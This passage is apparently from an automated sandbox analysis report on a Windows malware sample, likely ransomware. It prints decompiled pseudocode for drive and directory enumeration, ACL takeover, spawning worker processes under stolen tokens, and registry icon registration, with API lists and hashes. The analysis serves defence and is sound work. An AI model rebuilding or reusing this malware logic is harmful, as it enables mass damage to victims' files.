					L49:
					return _t66;
				}
				_t66 = RtlAllocateHeap( *0x40f5d6, 8, 6 + _t66 * 2);
				_v16 = _t66;
				if(_v16 == 0) {
					L45:
					if(_v16 != 0) {
						_t66 = RtlFreeHeap( *0x40f5d6, 0, _v16);
					}
					if(_v20 == 0) {
						goto L49;
					} else {
						return RtlFreeHeap( *0x40f5d6, 0, _v20);
					}
				} else {
					wcscpy(_v16, _a4);
					_t105 = _t104 + 8;
					E00405DC0(_v16);
					if( *0x40f5a1 != 0) {
						E004063FB(_v16,  *0x40f5d2);
					}
					if((GetFileAttributesW(_v16) & 0x00000010) != 0) {
						E00401A3A(_v16);
						_v12 = 0x2a;
						wcscat(_v16,  &_v12);
						_t105 = _t105 + 8;
					}
					_t66 = FindFirstFileExW(_v16, 0,  &_v612, 0, 0, _a8);
					_v8 = _t66;
					if(_v8 == 0xffffffff) {
						goto L45;
					} else {
						goto L7;
					}
					do {
						L7:
						_t99 =  &(_v612.cFileName);
						if( *_t99 != 0x2e &&  *_t99 != 0x2e002e) {
							if((_v612.dwFileAttributes & 0x00000010) == 0) {
								if((GetFileAttributesW(_a4) & 0x00000010) != 0) {
									if( *0x40f59a == 0 || E004065EA(_t99) == 0) {
										if( *0x40f59b == 0 || E00406577(_t99) == 0) {
											if( *0x40f5a1 == 0 || E0040625C(_v612.nFileSizeLow, _v612.nFileSizeHigh, _t99, _a4) == 0) {
												_t77 = E00405E35(_t99, _v612.nFileSizeLow, _v612.nFileSizeHigh, _a4);
												L37:
												if( *0x40f5a5 != 0) {
													if(_t77 == 0) {
														 *0x40f644 =  *0x40f644 + 1;
													} else {
														 *0x40f638 =  *0x40f638 + 1;
														 *0x40f63c =  *0x40f63c + _v612.nFileSizeLow;
														asm("adc [0x40f640], edx");
													}
												}
											} else {
											}
										} else {
										}
									} else {
									}
									goto L41;
								}
								_t82 = wcsstr(_v16, _t99);
								_t105 = _t105 + 8;
								 *_t82 = 0;
								if( *0x40f59a == 0 || E004065EA(_t99) == 0) {
									if( *0x40f59b == 0 || E00406577(_t99) == 0) {
										if( *0x40f5a1 == 0 || E0040625C(_v612.nFileSizeLow, _v612.nFileSizeHigh, _t99, _v16) == 0) {
											_t77 = E00405E35(_t99, _v612.nFileSizeLow, _v612.nFileSizeHigh, _v16);
											goto L37;
										} else {
											goto L41;
										}
									} else {
										goto L41;
									}
								} else {
									goto L41;
								}
							}
							if( *0x40f599 == 0 || E0040664B(_t99) == 0) {
								_t86 = wcslen(_t99);
								_t87 = wcslen(_v16);
								_t105 = _t105 + 8;
								_v20 = RtlAllocateHeap( *0x40f5d6, 8, 2 + (_t86 + _t87) * 2);
								if(_v20 != 0) {
									wcscpy(_v20, _v16);
									 *(wcsrchr(_v20, 0x2a)) = 0;
									wcscat(_v20, _t99);
									_t105 = _t105 + 0x18;
									E004066AC(_v20, _a8);
								}
							}
						}
						L41:
					} while (FindNextFileW(_v8,  &_v612) != 0);
					_t66 = FindClose(_v8);
					if( *0x40f59c != 0) {
						_t66 = E004064CC(_v16);
						if(_t66 != 0) {
							_t66 = E00406549(_v16);
						}
					}
					goto L45;
				}
			}

















                                                                                        0x004066ba
                                                                                        0x004066c1
                                                                                        0x004066cb
                                                                                        0x004066d1
                                                                                        0x004066d6
                                                                                        0x004069de
                                                                                        0x004069de
                                                                                        0x004069de
                                                                                        0x004066ec
                                                                                        0x004066f2
                                                                                        0x004066f9
                                                                                        0x004069a8
                                                                                        0x004069ac
                                                                                        0x004069b9
                                                                                        0x004069b9
                                                                                        0x004069c3
                                                                                        0x00000000
                                                                                        0x004069c5
                                                                                        0x00000000
                                                                                        0x004069d0
                                                                                        0x004066ff
                                                                                        0x00406705
                                                                                        0x0040670b
                                                                                        0x00406711
                                                                                        0x0040671d
                                                                                        0x00406728
                                                                                        0x00406728
                                                                                        0x0040673b
                                                                                        0x00406740
                                                                                        0x00406745
                                                                                        0x00406753
                                                                                        0x00406759
                                                                                        0x00406759
                                                                                        0x0040676f
                                                                                        0x00406775
                                                                                        0x0040677c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406782
                                                                                        0x00406782
                                                                                        0x00406782
                                                                                        0x0040678b
                                                                                        0x004067a7
                                                                                        0x0040684b
                                                                                        0x004068d8
                                                                                        0x004068f0
                                                                                        0x00406905
                                                                                        0x00406932
                                                                                        0x00406937
                                                                                        0x0040693e
                                                                                        0x00406942
                                                                                        0x00406964
                                                                                        0x00406944
                                                                                        0x00406944
                                                                                        0x00406956
                                                                                        0x0040695c
                                                                                        0x0040695c
                                                                                        0x00406942
                                                                                        0x00000000
                                                                                        0x00406920
                                                                                        0x00000000
                                                                                        0x004068fc
                                                                                        0x00000000
                                                                                        0x004068e4
                                                                                        0x00000000
                                                                                        0x004068d8
                                                                                        0x00406855
                                                                                        0x0040685b
                                                                                        0x0040685e
                                                                                        0x0040686a
                                                                                        0x00406882
                                                                                        0x0040689a
                                                                                        0x004068ca
                                                                                        0x00000000
                                                                                        0x004068b5
                                                                                        0x00000000
                                                                                        0x004068b5
                                                                                        0x0040688e
                                                                                        0x00000000
                                                                                        0x0040688e
                                                                                        0x00406876
                                                                                        0x00000000
                                                                                        0x00406876
                                                                                        0x0040686a
                                                                                        0x004067b4
                                                                                        0x004067c6
                                                                                        0x004067d4
                                                                                        0x004067da
                                                                                        0x004067f5
                                                                                        0x004067fc
                                                                                        0x00406804
                                                                                        0x0040681b
                                                                                        0x00406824
                                                                                        0x0040682a
                                                                                        0x00406833
                                                                                        0x00406833
                                                                                        0x00406838
                                                                                        0x004067b4
                                                                                        0x0040696a
                                                                                        0x0040697a
                                                                                        0x00406985
                                                                                        0x00406992
                                                                                        0x00406997
                                                                                        0x0040699e
                                                                                        0x004069a3
                                                                                        0x004069a3
                                                                                        0x0040699e
                                                                                        0x00000000
                                                                                        0x00406992

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 004066CB
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000003), ref: 004066EC
                                                                                        • wcscpy.NTDLL ref: 00406705
                                                                                          • Part of subcall function 00405DC0: GetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000004,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000003), ref: 00405DDE
                                                                                          • Part of subcall function 00405DC0: SetEntriesInAclW.ADVAPI32(00000001,00405D91,00000000,00406716,?,?,?,00000003), ref: 00405DF6
                                                                                          • Part of subcall function 00405DC0: SetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000005,00405D85,00000000,00406716,00000000,?,?,?,00000003), ref: 00405E13
                                                                                          • Part of subcall function 00405DC0: RtlFreeHeap.NTDLL(00000000,00406716), ref: 00405E24
                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000), ref: 00406730
                                                                                        • wcscat.NTDLL ref: 00406753
                                                                                        • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040676F
                                                                                        • wcslen.NTDLL ref: 004067C6
                                                                                        • wcslen.NTDLL ref: 004067D4
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004067EF
                                                                                        • wcscpy.NTDLL ref: 00406804
                                                                                        • wcsrchr.NTDLL ref: 00406812
                                                                                        • wcscat.NTDLL ref: 00406824
                                                                                          • Part of subcall function 004066AC: GetFileAttributesW.KERNEL32(?), ref: 00406840
                                                                                          • Part of subcall function 004066AC: wcsstr.NTDLL ref: 00406855
                                                                                          • Part of subcall function 00406577: PathFindExtensionW.SHLWAPI(004068F8,?,?,?,?,?), ref: 0040659B
                                                                                          • Part of subcall function 00406577: _wcsicmp.NTDLL ref: 004065AE
                                                                                        • FindNextFileW.KERNEL32(000000FF,?), ref: 00406974
                                                                                        • FindClose.KERNEL32(000000FF), ref: 00406985
                                                                                          • Part of subcall function 004063FB: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,00000003), ref: 00406415
                                                                                          • Part of subcall function 004063FB: GetFileAttributesW.KERNEL32(00000000,?,?,?,00000003), ref: 0040641E
                                                                                          • Part of subcall function 004063FB: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000003), ref: 0040642E
                                                                                          • Part of subcall function 004063FB: strlen.NTDLL ref: 0040649D
                                                                                          • Part of subcall function 004063FB: SetCurrentDirectoryW.KERNEL32(?,0040F610,?,00000000), ref: 004064BB
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004069B9
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004069D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileHeap$Find$AttributesCurrentDirectoryFreewcslen$AllocateInfoNamedSecuritywcscatwcscpy$CloseEntriesExtensionFirstNextPath_wcsicmpstrlenwcsrchrwcsstr
                                                                                        • String ID: *
                                                                                        • API String ID: 4090008161-163128923
                                                                                        • Opcode ID: e14989edb91f7a36e79630f524d463a7723156a75bd546b4c07c7c80fbd5bede
                                                                                        • Instruction ID: b5e5f5ae924ab5d723afb11aecffd3da9daab4e8ff1d640df2b385bb3f7072ef
                                                                                        • Opcode Fuzzy Hash: e14989edb91f7a36e79630f524d463a7723156a75bd546b4c07c7c80fbd5bede
                                                                                        • Instruction Fuzzy Hash: A58149B1800209BAEF216F60ED09BAE7B75FB04305F054076F806715F1D77A4A69DB19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406EB7, Relevance: 30.2, APIs: 20, Instructions: 203memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 84%
                                                                                        			E00406EB7() {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				short _v544;
				char _t71;
				void* _t75;
				void* _t76;
				void* _t78;
				void* _t79;
				long _t82;
				signed int _t84;
				long _t85;
				void* _t94;
				void* _t95;
				WCHAR* _t96;

				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = E00406BF9();
				if(GetModuleFileNameW(0,  &_v544, 0x104) != 0) {
					_t82 = GetLogicalDriveStringsW(0, 0);
					if(_t82 != 0) {
						_v20 = RtlAllocateHeap( *0x40f5d6, 8, _t82 * 2);
						if(_v20 != 0) {
							_t84 = GetLogicalDriveStringsW(_t82, _v20) >> 2;
							_v16 = RtlAllocateHeap( *0x40f5d6, 8, _t84 * 4);
							if(_v16 != 0) {
								if( *0x40f5a5 == 0) {
									_v12 = 0;
									goto L13;
								} else {
									_t71 = RtlAllocateHeap( *0x40f5d6, 8, _t84 * 4);
									_v12 = _t71;
									if(_v12 != 0) {
										L13:
										_v8 = 0;
										_t96 = _v20;
										do {
											_t71 = GetDriveTypeW(_t96);
											if(_t71 == 3 || _t71 == 2 || _t71 == 4) {
												E00406C06(0,  &_v544, _t96, _v8, _v16, _v12);
												_v8 = _v8 + 1;
												_t71 = _v24;
												if(_v8 == _t71) {
													_t78 = WaitForMultipleObjects(_v8, _v16, 1, 0xffffffff);
													_push(_t96);
													if(_v12 != 0) {
														_push(_v8);
														do {
															asm("lodsd");
															_t95 = _t78;
															_t79 = MapViewOfFile(_t95, 0xf001f, 0, 0, 0x10);
															if(_t79 != 0) {
																 *0x40f638 =  *0x40f638 +  *_t79;
																 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t79 + 4));
																 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t79 + 8));
																asm("adc [0x40f640], ecx");
																UnmapViewOfFile(_t79);
															}
															_t78 = NtClose(_t95);
															_v8 = _v8 - 1;
														} while (_v8 != 0);
														_pop( *_t38);
													}
													do {
														asm("lodsd");
														_t78 = NtClose(_t78);
														_v8 = _v8 - 1;
													} while (_v8 != 0);
													_pop(_t96);
												}
											}
											_t96 =  &(_t96[4]);
											_t84 = _t84 - 1;
										} while (_t84 != 0);
										if(_v8 != 0) {
											_t75 = WaitForMultipleObjects(_v8, _v16, 1, 0xffffffff);
											if(_v12 != 0) {
												_t85 = _v8;
												do {
													asm("lodsd");
													_t94 = _t75;
													_t76 = MapViewOfFile(_t94, 0xf001f, 0, 0, 0x10);
													if(_t76 != 0) {
														 *0x40f638 =  *0x40f638 +  *_t76;
														 *0x40f644 =  *0x40f644 +  *((intOrPtr*)(_t76 + 4));
														 *0x40f63c =  *0x40f63c +  *((intOrPtr*)(_t76 + 8));
														asm("adc [0x40f640], ecx");
														UnmapViewOfFile(_t76);
													}
													_t75 = NtClose(_t94);
													_t85 = _t85 - 1;
												} while (_t85 != 0);
											}
											do {
												asm("lodsd");
												_t75 = NtClose(_t75);
												_v8 = _v8 - 1;
											} while (_v8 != 0);
										}
									} else {
									}
								}
							} else {
							}
						} else {
						}
					} else {
					}
				} else {
				}
				if(_v20 != 0) {
					_t71 = RtlFreeHeap( *0x40f5d6, 0, _v20);
				}
				if(_v16 != 0) {
					_t71 = RtlFreeHeap( *0x40f5d6, 0, _v16);
				}
				if(_v12 != 0) {
					return RtlFreeHeap( *0x40f5d6, 0, _v12);
				}
				return _t71;
			}




















                                                                                        0x00406ec5
                                                                                        0x00406ecc
                                                                                        0x00406ed3
                                                                                        0x00406edf
                                                                                        0x00406ef8
                                                                                        0x00406f09
                                                                                        0x00406f0d
                                                                                        0x00406f2a
                                                                                        0x00406f31
                                                                                        0x00406f44
                                                                                        0x00406f5d
                                                                                        0x00406f64
                                                                                        0x00406f72
                                                                                        0x00406f9a
                                                                                        0x00000000
                                                                                        0x00406f74
                                                                                        0x00406f84
                                                                                        0x00406f8a
                                                                                        0x00406f91
                                                                                        0x00406fa1
                                                                                        0x00406fa1
                                                                                        0x00406fa8
                                                                                        0x00406fab
                                                                                        0x00406fac
                                                                                        0x00406fb5
                                                                                        0x00406fd8
                                                                                        0x00406fdd
                                                                                        0x00406fe0
                                                                                        0x00406fe6
                                                                                        0x00406ff6
                                                                                        0x00406ffc
                                                                                        0x00407001
                                                                                        0x00407003
                                                                                        0x00407009
                                                                                        0x00407009
                                                                                        0x0040700a
                                                                                        0x00407018
                                                                                        0x00407020
                                                                                        0x00407024
                                                                                        0x0040702d
                                                                                        0x00407036
                                                                                        0x0040703f
                                                                                        0x00407046
                                                                                        0x00407046
                                                                                        0x0040704d
                                                                                        0x00407053
                                                                                        0x00407056
                                                                                        0x0040705c
                                                                                        0x0040705c
                                                                                        0x00407062
                                                                                        0x00407062
                                                                                        0x00407064
                                                                                        0x0040706a
                                                                                        0x0040706d
                                                                                        0x00407073
                                                                                        0x00407073
                                                                                        0x00406fe6
                                                                                        0x00407074
                                                                                        0x00407077
                                                                                        0x00407078
                                                                                        0x00407084
                                                                                        0x00407090
                                                                                        0x0040709a
                                                                                        0x0040709c
                                                                                        0x004070a2
                                                                                        0x004070a2
                                                                                        0x004070a3
                                                                                        0x004070b1
                                                                                        0x004070b9
                                                                                        0x004070bd
                                                                                        0x004070c6
                                                                                        0x004070cf
                                                                                        0x004070d8
                                                                                        0x004070df
                                                                                        0x004070df
                                                                                        0x004070e6
                                                                                        0x004070ec
                                                                                        0x004070ed
                                                                                        0x004070a2
                                                                                        0x004070f4
                                                                                        0x004070f4
                                                                                        0x004070f6
                                                                                        0x004070fc
                                                                                        0x004070ff
                                                                                        0x004070f4
                                                                                        0x00000000
                                                                                        0x00406f93
                                                                                        0x00406f91
                                                                                        0x00000000
                                                                                        0x00406f66
                                                                                        0x00000000
                                                                                        0x00406f33
                                                                                        0x00000000
                                                                                        0x00406f0f
                                                                                        0x00000000
                                                                                        0x00406efa
                                                                                        0x00407109
                                                                                        0x00407116
                                                                                        0x00407116
                                                                                        0x00407120
                                                                                        0x0040712d
                                                                                        0x0040712d
                                                                                        0x00407137
                                                                                        0x00000000
                                                                                        0x00407144
                                                                                        0x00407152

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,00000000), ref: 00406EF0
                                                                                        • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,?,00000000), ref: 00406F03
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00407116
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040712D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00407144
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$DriveFileLogicalModuleNameStrings
                                                                                        • String ID:
                                                                                        • API String ID: 2101175942-0
                                                                                        • Opcode ID: 7c1ed1744f26a96ee03ef0cd4bf28a932c83e6c39daf279f305b0f73070da3cb
                                                                                        • Instruction ID: 643bebd2de4cfbeb964a38458f755a79d9fe05758559f9758bfbd7b921b65dbd
                                                                                        • Opcode Fuzzy Hash: 7c1ed1744f26a96ee03ef0cd4bf28a932c83e6c39daf279f305b0f73070da3cb
                                                                                        • Instruction Fuzzy Hash: 72815B30904208FFDB219F94ED48BAE77B5FB04315F10417AE501B66E1C7792E59DB4A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406C06, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 180processmemorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E00406C06(void* _a4, wchar_t* _a8, wchar_t* _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				char _v128;
				char _v196;
				short _v260;
				WCHAR* _v264;
				int _t76;
				char _t79;
				wchar_t* _t80;
				int _t89;
				intOrPtr* _t94;
				intOrPtr* _t108;

				_t76 = wcslen(_a8);
				_t79 = RtlAllocateHeap( *0x40f5d6, 8, 0x46 + (_t76 + wcslen(_a12)) * 2);
				_v264 = _t79;
				if(_v264 != 0) {
					_t80 = wcschr(_a12, 0x20);
					_t108 =  &_v196;
					 *_t108 = 0x730025;
					 *((intOrPtr*)(_t108 + 4)) = 0x2d0020;
					 *((intOrPtr*)(_t108 + 8)) = 0x6f0077;
					 *((intOrPtr*)(_t108 + 0xc)) = 0x6b0072;
					 *((intOrPtr*)(_t108 + 0x10)) = 0x770020;
					 *((intOrPtr*)(_t108 + 0x14)) = 0x72006f;
					 *((intOrPtr*)(_t108 + 0x18)) = 0x65006b;
					 *((intOrPtr*)(_t108 + 0x1c)) = 0x250072;
					 *((intOrPtr*)(_t108 + 0x20)) = 0x200064;
					 *((intOrPtr*)(_t108 + 0x24)) = 0x70002d;
					 *((intOrPtr*)(_t108 + 0x28)) = 0x740061;
					 *((intOrPtr*)(_t108 + 0x2c)) = 0x200068;
					if(_t80 != 0) {
						 *((intOrPtr*)(_t108 + 0x30)) = 0x5c0022;
						 *((intOrPtr*)(_t108 + 0x34)) = 0x3f005c;
						 *((intOrPtr*)(_t108 + 0x38)) = 0x25005c;
						 *(_t108 + 0x3c) = 0x220073;
						 *(_t108 + 0x40) = 0;
					} else {
						 *((intOrPtr*)(_t108 + 0x30)) = 0x5c005c;
						 *((intOrPtr*)(_t108 + 0x34)) = 0x5c003f;
						 *((intOrPtr*)(_t108 + 0x38)) = 0x730025;
						 *(_t108 + 0x3c) = 0;
					}
					 *0x40f69c(_v264,  &_v196, _a8, _a16, _a12);
					memset( &_v92, 0, 0x10);
					memset( &_v76, 0, 0x48);
					_v76.cb = 0x48;
					if(_a4 == 0) {
						_t89 = CreateProcessW(0, _v264, 0, 0, 1, 0x80004, 0, 0,  &_v76,  &_v92);
					} else {
						E00401AE1(_a4);
						if(E00401EBC() == 0) {
							_t89 =  *0x40f820(_a4, 2, 0, _v264, 4, 0, 0,  &_v76,  &_v92);
						} else {
							_t89 = CreateProcessAsUserW(_a4, 0, _v264, 0, 0, 0, 0x80004, 0, 0,  &_v76,  &_v92);
						}
					}
					if(_t89 != 0) {
						if(_a24 != 0) {
							_t94 =  &_v128;
							 *_t94 = 0x6f004c;
							 *((intOrPtr*)(_t94 + 4)) = 0x610063;
							 *((intOrPtr*)(_t94 + 8)) = 0x5c006c;
							 *((intOrPtr*)(_t94 + 0xc)) = 0x6f0077;
							 *((intOrPtr*)(_t94 + 0x10)) = 0x6b0072;
							 *((intOrPtr*)(_t94 + 0x14)) = 0x720065;
							 *((intOrPtr*)(_t94 + 0x18)) = 0x750025;
							 *((intOrPtr*)(_t94 + 0x1c)) = 0x25002d;
							 *((intOrPtr*)(_t94 + 0x20)) = 0x75;
							 *0x40f69c( &_v260,  &_v128, _a16, _v92.dwProcessId);
							 *((intOrPtr*)(_a16 * 4 + _a24)) = CreateFileMappingW(0xffffffff, 0, 4, 0, 0x10,  &_v260);
						}
						 *(_a16 * 4 + _a20) = _v92.hProcess;
						ResumeThread(_v92.hThread);
						NtClose(_v92.hThread);
					}
					_t79 = RtlFreeHeap( *0x40f5d6, 0, _v264);
					if(_a4 != 0) {
						return E00401B60();
					}
				}
				return _t79;
			}















                                                                                        0x00406c17
                                                                                        0x00406c40
                                                                                        0x00406c46
                                                                                        0x00406c53
                                                                                        0x00406c5e
                                                                                        0x00406c67
                                                                                        0x00406c6d
                                                                                        0x00406c73
                                                                                        0x00406c7a
                                                                                        0x00406c81
                                                                                        0x00406c88
                                                                                        0x00406c8f
                                                                                        0x00406c96
                                                                                        0x00406c9d
                                                                                        0x00406ca4
                                                                                        0x00406cab
                                                                                        0x00406cb2
                                                                                        0x00406cb9
                                                                                        0x00406cc2
                                                                                        0x00406ce2
                                                                                        0x00406ce9
                                                                                        0x00406cf0
                                                                                        0x00406cf7
                                                                                        0x00406cfe
                                                                                        0x00406cc4
                                                                                        0x00406cc4
                                                                                        0x00406ccb
                                                                                        0x00406cd2
                                                                                        0x00406cd9
                                                                                        0x00406cd9
                                                                                        0x00406d1b
                                                                                        0x00406d2c
                                                                                        0x00406d3d
                                                                                        0x00406d46
                                                                                        0x00406d51
                                                                                        0x00406dd0
                                                                                        0x00406d53
                                                                                        0x00406d56
                                                                                        0x00406d62
                                                                                        0x00406da9
                                                                                        0x00406d64
                                                                                        0x00406d86
                                                                                        0x00406d86
                                                                                        0x00406daf
                                                                                        0x00406dd8
                                                                                        0x00406de2
                                                                                        0x00406de8
                                                                                        0x00406deb
                                                                                        0x00406df1
                                                                                        0x00406df8
                                                                                        0x00406dff
                                                                                        0x00406e06
                                                                                        0x00406e0d
                                                                                        0x00406e14
                                                                                        0x00406e1b
                                                                                        0x00406e22
                                                                                        0x00406e3a
                                                                                        0x00406e67
                                                                                        0x00406e67
                                                                                        0x00406e79
                                                                                        0x00406e7e
                                                                                        0x00406e87
                                                                                        0x00406e87
                                                                                        0x00406e9b
                                                                                        0x00406ea5
                                                                                        0x00000000
                                                                                        0x00406ea7
                                                                                        0x00406ea5
                                                                                        0x00406eb4

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 00406C17
                                                                                        • wcslen.NTDLL ref: 00406C25
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00406C40
                                                                                        • wcschr.NTDLL ref: 00406C5E
                                                                                        • _swprintf.NTDLL ref: 00406D1B
                                                                                        • memset.NTDLL ref: 00406D2C
                                                                                        • memset.NTDLL ref: 00406D3D
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00080004,00000000,00000000,00000048,?,00000000), ref: 00406D86
                                                                                        • CreateProcessWithTokenW.ADVAPI32(00000000,00000002,00000000,?,00000004,00000000,00000000,00000048,?), ref: 00406DA9
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00080004,00000000,00000000,00000048,?), ref: 00406DD0
                                                                                        • _swprintf.NTDLL ref: 00406E3A
                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000010,?), ref: 00406E54
                                                                                        • ResumeThread.KERNEL32(?), ref: 00406E7E
                                                                                        • NtClose.NTDLL(?), ref: 00406E87
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00406E9B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Create$Process$Heap_swprintfmemsetwcslen$AllocateCloseFileFreeMappingResumeThreadTokenUserWithwcschr
                                                                                        • String ID: H$ty@
                                                                                        • API String ID: 3330652022-1512611679
                                                                                        • Opcode ID: 221865317ba51a6fb8d9728862b77ebc403b43aab8f5ff42e48b7a266f4dd0a6
                                                                                        • Instruction ID: 57929b792f3314dfecdb3ad420f60d13cb815857ec55278c1469091712f12db6
                                                                                        • Opcode Fuzzy Hash: 221865317ba51a6fb8d9728862b77ebc403b43aab8f5ff42e48b7a266f4dd0a6
                                                                                        • Instruction Fuzzy Hash: 50814DB1500208EFEB209F90DD49F993BB5FF04709F204179E6056E1E2D7B6956ACF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004039E3, Relevance: 27.1, APIs: 18, Instructions: 146memoryregistrynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E004039E3(void* __eflags, short* _a4) {
				void* _v8;
				short _v12;
				short _v76;
				long _v596;
				intOrPtr* _t38;
				signed int _t40;
				long _t48;
				signed int _t50;
				long _t71;
				wchar_t* _t72;
				short* _t73;
				void* _t74;
				void* _t75;
				void* _t76;

				_v12 = 0;
				_t72 =  &_v596;
				 *0x40f8b8(0, _t72, 0x23, 0);
				E00401A3A(_t72);
				wcscat(_t72,  &(_a4[1]));
				_t38 = _t72 + wcslen(_t72) * 2;
				 *_t38 = 0x69002e;
				 *((intOrPtr*)(_t38 + 4)) = 0x6f0063;
				 *(_t38 + 8) = 0;
				_t75 = E00401D08(0x40d073);
				_t40 =  *0x40d06f; // 0x16b9
				_t74 = RtlAllocateHeap( *0x40f5d6, 0, _t40 * 8);
				E00401C9B(_t72, _t74, E0040A135(_t75, _t74));
				RtlFreeHeap( *0x40f5d6, 0, _t75);
				RtlFreeHeap( *0x40f5d6, 0, _t74);
				_t48 = RegCreateKeyExW(0x80000000, _a4, 0, 0, 0, 0x20106, 0,  &_v8, 0);
				if(_t48 == 0) {
					_t73 = _a4;
					_t13 =  &(_t73[1]); // 0x2
					_t50 = wcslen(_t13);
					_t16 =  &(_t73[1]); // 0x2
					RegSetValueExW(_v8,  &_v12, 0, 1, _t16, 2 + _t50 * 2);
					NtClose(_v8);
					_t20 =  &(_t73[1]); // 0x2
					wcscpy( &_v76, _t20);
					_t76 = E00401D08(0x40e730);
					wcscat( &_v76, _t76);
					RtlFreeHeap( *0x40f5d6, 0, _t76);
					_t48 = RegCreateKeyExW(0x80000000,  &_v76, 0, 0, 0, 0x20106, 0,  &_v8, 0);
					if(_t48 == 0) {
						RegSetValueExW(_v8,  &_v12, 0, 1,  &_v596, 2 + wcslen( &_v596) * 2);
						_t71 = NtClose(_v8);
						SHChangeNotify(0x8000000, 0x1000, 0, 0);
						return _t71;
					}
				}
				return _t48;
			}

















                                                                                        0x004039f1
                                                                                        0x004039f8
                                                                                        0x00403a05
                                                                                        0x00403a0c
                                                                                        0x00403a19
                                                                                        0x00403a2c
                                                                                        0x00403a2f
                                                                                        0x00403a35
                                                                                        0x00403a3c
                                                                                        0x00403a4d
                                                                                        0x00403a4f
                                                                                        0x00403a6a
                                                                                        0x00403a76
                                                                                        0x00403a84
                                                                                        0x00403a93
                                                                                        0x00403ab4
                                                                                        0x00403abc
                                                                                        0x00403ac2
                                                                                        0x00403ac5
                                                                                        0x00403ac9
                                                                                        0x00403ada
                                                                                        0x00403ae9
                                                                                        0x00403af2
                                                                                        0x00403af8
                                                                                        0x00403b00
                                                                                        0x00403b13
                                                                                        0x00403b1a
                                                                                        0x00403b2c
                                                                                        0x00403b4e
                                                                                        0x00403b56
                                                                                        0x00403b82
                                                                                        0x00403b8b
                                                                                        0x00403b9f
                                                                                        0x00000000
                                                                                        0x00403b9f
                                                                                        0x00403b56
                                                                                        0x00403bad

                                                                                        APIs
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000023,00000000,?,?,?,?,00000000), ref: 00403A05
